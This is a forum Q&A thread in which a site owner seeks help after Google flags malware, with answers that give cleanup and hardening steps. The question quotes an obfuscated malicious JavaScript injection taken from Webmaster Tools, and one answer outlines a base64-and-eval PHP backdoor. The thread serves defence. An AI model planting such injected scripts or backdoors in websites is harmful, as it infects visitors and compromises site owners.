# Malware on the site as per google but I cannot find it

Tags: malware

yesterday when I came to one of my sites I got a warning from google that there is malware on my site. I looked at the code and there was indeed some javascript that shouldn't be there. I googled it and didn't find anything usefull. When I came back to my site, that code was gone, but google (when accessing the site from the search engine) and google chrome still give me a warning that there is malware on my site.

I looked at webmaster tools and they have identified few pages as problematic. One of them is http://www.keramikfliesen.com/schweiz/rimini/. The code that is listed in the webmaster tools under Malware is:

```
<script type='text/javascript'>st="no3nen0orno3pno3rxstxpno3
rxnl";Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~
%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^@$|&:&&$?$]^<^]^]
&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!@!?
^+^]^!^$+*^&^@!&&<!$$|&^^]&_&*!!$|++&<!+&*^@&^$_!^&*!+*+&:&]
&*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<!+&*$?&^$_&!
&*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*^]&!
^<$@$$^]$$$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:
$@$$^@&*!?!|&:!$&*!^^]$$$@&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$@
$$^@!|&<!+&?^]$~$$^@&!^^^]$$&?!+!+!|^#$~$~$$$@!^!+$_!$&*!|&)
&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!
$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$@$$$~!+
&~!|^$$_&?!+&]&)$$^@!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_
!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~
&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?
$:!@!]^@&?$_!|!$&~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+&:&~&_$?$:!@
!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@!&&<!$$|&&^]
&+&~
```

Can you please help me out? How should I fight this?

Thank you all very much for your help in advance!

Answer (score 2):

- Remove the malware from your webpages.
- Immediately change your passwords.
- Also check for any [XSS](http://www.owasp.org/index.php/Cross_Site_Scripting) (cross-site scripting) and [SQL injection](http://www.owasp.org/index.php/SQL_injection) vulnerabilities.
- deactivate plugins that are not high ranked or from reputed source.
- Use secure protocols.check out StopBadware.org's [Tips for Cleaning and Securing Your Website](http://www.stopbadware.org/home/security).
- Keep an eye on your log files.
- Stay up-to-date with the latest software updates and patches.


  Hope it helps!

Comment: Once you're sure your site is free from any infected code and content, you can request a malware review on google. Hope it wont happen to you again!

Comment: But the site seems clean now right? I can't find anything and I already changed the passwords.

Comment: as long as you have gone through from these points, you can turn off the Remote Publishing from your wp-admin on wrting page. and Request a malware review:

    On the Webmaster Tools Home page, select the site you want.
    Click Health, and then click Malware.
    Click Request a review.

Comment: Thanks! How long does this usually take?

Comment: Update: Code appeared again, but then dissapeared right away.
How should I start fighting this? I have no idea where it's coming from and it goes away upon refresh :S

Answer (score 1):

If the code appears again, then the attacker left some script, which, on request, runs the infecting procedure. Usually this script receives an encoded string of the malcode (e.g. in `base64`), decodes it and executes via `eval()`. You should find this file (it is most likely a PHP script) and remove it. To find it look at the log and search for suspicious requests (e.g. a single `POST` request, transmitting `base64` string is a very suspicious one).

Answer (score 0):

Most probably your hosting has been compromised (password stolen) by an automated tool.
This tools typically inject some javascript inside js files in order to infect the people visiting your pages with malware. You should :

1. Change your passwords.
2. Restore the most recent **non** compromised backup.

Comment: I already did that. Is there anything on the site that is still problematic? Please check as I cannot find it. :( Thank you very much in advance!